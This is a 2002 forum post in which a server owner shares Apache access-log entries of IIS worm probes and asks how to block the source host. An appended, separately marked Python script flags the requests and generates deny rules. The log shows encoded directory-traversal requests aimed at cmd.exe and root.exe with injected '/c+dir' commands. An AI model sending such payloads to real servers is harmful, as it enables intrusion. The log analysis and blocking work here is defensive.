December 1st, 2002, 07:37 PM
#1
apache access.log
So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"

And is there a way for me to make Apache just deny any requests from this other machine? I've found quite a few more and I think another host is actually doing this same routine as we speak.
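An added example, not part of the original post: a small log triage script that groups requests like the ones above by client, flagging three traits visible in them (percent-encoding nested more than one layer deep, the bytes 0xC0/0xC1 that never occur in well-formed UTF-8, and paths ending in cmd.exe or root.exe). The sample log is constructed with documentation-range addresses, and the function names and tag names are made up for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in the post's log format; documentation-range addresses.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
192.0.2.10 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
192.0.2.10 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
198.51.100.7 - - [27/Nov/2002:23:21:02 -0600] "GET /docs/My%20Notes.html HTTP/1.0" 200 5120 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)')  # client, request target

def decode_layers(path, max_rounds=4):
    """Percent-decode until stable; return (decoded bytes, rounds that changed it)."""
    data, rounds = path.encode("latin-1", "replace"), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(data)  # malformed escapes such as '%%' are left as-is
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(target):
    """Return the set of probe traits found in one request target."""
    data, rounds = decode_layers(target.split("?", 1)[0])
    tags = set()
    if rounds >= 2:  # e.g. %255c -> %5c -> backslash; 'My%20Notes' needs only one round
        tags.add("double-encoded")
    if b"\xc0" in data or b"\xc1" in data:  # can also fire on Latin-1 encoded URLs
        tags.add("overlong-utf8")
    if re.search(rb"(cmd|root)\.exe$", data.lower()):
        tags.add("shell-probe")
    return tags

def suspicious_clients(log_text):
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (tags := classify(m.group(2))):
            hits[m.group(1)] |= tags
    return {ip: sorted(tags) for ip, tags in hits.items()}

def deny_lines(hits):  # mod_access syntax (Apache 1.3/2.0/2.2); 2.4 uses 'Require not ip'
    return [f"Deny from {ip}" for ip in sorted(hits)]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG), deny_lines(suspicious_clients(SAMPLE_LOG)))
```

The generated `Deny from` lines belong inside a `<Directory>` or `<Location>` block that also carries `Order Allow,Deny` and `Allow from all`. Review the list before applying it, since the overlong-byte check can also match legitimate Latin-1 encoded URLs.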